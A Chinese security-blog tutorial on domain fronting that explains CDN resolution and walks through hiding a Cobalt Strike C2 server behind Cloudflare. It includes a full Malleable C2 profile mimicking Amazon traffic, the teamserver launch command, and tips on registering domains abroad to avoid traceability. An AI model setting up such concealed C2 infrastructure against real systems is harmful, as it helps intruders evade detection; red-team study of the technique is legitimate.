域前置介绍
域前置又译为域名幌子,是一种隐藏连接真实端点来规避互联网审查的技术。在应用层上运作时,域前置使用户能通过HTTPS连接到被屏蔽的服务,而表面上像在与另一个完全不同的站点通信。
域前置工作原理
域前置核心就是CDN,可以通过添加 A 记录或 AAAA 记录解析的方式将网站域名指向网站服务器公网 IP 地址,来实现用户可以通过域名直接访问已部署在服务器上的网站,而无需使用难记且无明显标识的 IP 地址访问。CDN能够对域名进行加速,当对某个域名进行访问时,并不会直接解析到IP,因此可以给攻击VPS申请一个CDN加速服务,从而达到隐藏IP的效果
CDN工作原理
cnd又叫内容分发网络(Content Delivery Network)
当用户访问域名时,先请求LDNS(即本地dns),如果有缓存会返回给用户ip地址,如果LNDS无缓存即向授权DNS请求,授权DNS解析域名返回别名域名,域名解析请求发送至公有云DNS调度系统,则会分配最佳节点ip地址,LDNS会缓存该IP地址,用户根据该ip地址请求资源,节点ip隐藏了真实ip的地址
如果不明白可以参考阿里云的文章
https://developer.aliyun.com/article/779328?spm=5176.21213303.J_6704733920.7.2a5e53c99XBn0I&scm=20140722.S_community%40%40%E6%96%87%E7%AB%A0%40%40779328._.ID_community%40%40%E6%96%87%E7%AB%A0%40%40779328-RL_cdn%E5%B7%A5%E4%BD%9C%E5%8E%9F%E7%90%86-LOC_main-OR_ser-V_2-P0_0
搭建过程
这里选择腾讯云的域名
![null 图片[1]-域前置技术和C2隐藏-NGC660安全实验室](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-190825-16680619801.png)
先实名后注册,注册时间可能比较久,在腾讯云服务器上,根据申请的域名添加解析记录。
![null 图片[2]-域前置技术和C2隐藏-NGC660安全实验室](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-190825-1668061981.png)
域名备案,实际上国内的备案了之后Redteam已无法使用了。
注册 cloudflare
https://www.cloudflare.com/zh-cn/
进入后添加站点
![null 图片[3]-域前置技术和C2隐藏-NGC660安全实验室](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-190825-1668061982.png)
输入申请的域名别名,选择免费即可
![null 图片[4]-域前置技术和C2隐藏-NGC660安全实验室](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-190825-1668061983.png)
继续
![null 图片[5]-域前置技术和C2隐藏-NGC660安全实验室](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-190825-1668061984.png)
这里会对域名的A记录和CNAME自动进行检测
![null 图片[6]-域前置技术和C2隐藏-NGC660安全实验室](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-190825-1668061985.png)
这个时候邮箱会收到cloudflare的邮件。
修改dns记录,域名注册->我的域名->概览位置修改dns
![null 图片[7]-域前置技术和C2隐藏-NGC660安全实验室](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-190825-1668061988.png)
然后等待dns刷新即可,此时我们ping一下我们的域名发现,解析后的ip地址不是真实的ip地址。
![null 图片[8]-域前置技术和C2隐藏-NGC660安全实验室](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-190825-1668061989.png)
ip地址为cloudflare的ip
![null 图片[9]-域前置技术和C2隐藏-NGC660安全实验室](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-190825-16680619891.png)
![null 图片[10]-域前置技术和C2隐藏-NGC660安全实验室](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-190825-1668061990.png)
nslookup查询
![null 图片[11]-域前置技术和C2隐藏-NGC660安全实验室](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-190825-1668061991.png)
SSL/TLS
如果要实现https加密需要下载配置c2证书
![null 图片[12]-域前置技术和C2隐藏-NGC660安全实验室](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-190825-16680619911.png)
下载证书
![null 图片[13]-域前置技术和C2隐藏-NGC660安全实验室](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-190825-1668061994.png)
在VPS需重新生成cs的配置文件cobalstrike.store
C2配置隐藏
项目地址
https://github.com/rsmudge/Malleable-C2-Profiles
set sleeptime "5000";set jitter "0";set maxdns "255";set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";http-get { set uri "/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books"; client { header "Accept" "*/*"; header "Host" "www.xxx.xxx"; #配置自己的根域名不是别名 metadata { base64; prepend "session-token="; prepend "skin=noskin;"; append "csm-hit=s-24KU11BB82RZSYGJ3BDK|1419899012996"; header "Cookie"; } } server { header "Server" "Server"; header "x-amz-id-1" "THKUYEZKCKPGY5T42PZT"; header "x-amz-id-2" "a21yZ2xrNDNtdGRsa212bGV3YW85amZuZW9ydG5rZmRuZ2tmZGl4aHRvNDVpbgo="; header "X-Frame-Options" "SAMEORIGIN"; header "Content-Encoding" "gzip"; output { print; } }}http-post { set uri "/N4215/adj/amzn.us.sr.aps"; client { header "Accept" "*/*"; header "Content-Type" "text/xml"; header "X-Requested-With" "XMLHttpRequest"; header "Host" "www.xxx.xxx"; #配置自己的根域名不是别名 parameter "sz" "160x600"; parameter "oe" "oe=ISO-8859-1;"; id { parameter "sn"; } parameter "s" "3717"; parameter "dc_ref" "http%3A%2F%2Fwww.amazon.com"; output { base64; print; } } server { header "Server" "Server"; header "x-amz-id-1" "THK9YEZJCKPGY5T42OZT"; header "x-amz-id-2" "a21JZ1xrNDNtdGRsa219bGV3YW85amZuZW9zdG5rZmRuZ2tmZGl4aHRvNDVpbgo="; header "X-Frame-Options" "SAMEORIGIN"; header "x-ua-compatible" "IE=edge"; output { print; } }}
启动服务端,调用配置文件
./teamserver cs服务端ip password config.profile
生成监听
![null 图片[14]-域前置技术和C2隐藏-NGC660安全实验室](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-190825-1668061999.png)
保存
![null 图片[15]-域前置技术和C2隐藏-NGC660安全实验室](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-190825-1668062002.png)
生成64位的应用程序
![null 图片[16]-域前置技术和C2隐藏-NGC660安全实验室](https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-190825-16680620021.png)
成功上线
TIPS
实名注册的腾讯云域名的话是有备案的,所以这里的话建议选择国外的服务器注册域名。
参考文章
https://www.modb.pro/db/154929
https://www.freesion.com/article/66781164537/
http://www.tdaidc.com/help/article/517.html
本文作者:合天网安实验室
本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/190825.html
请登录后查看评论内容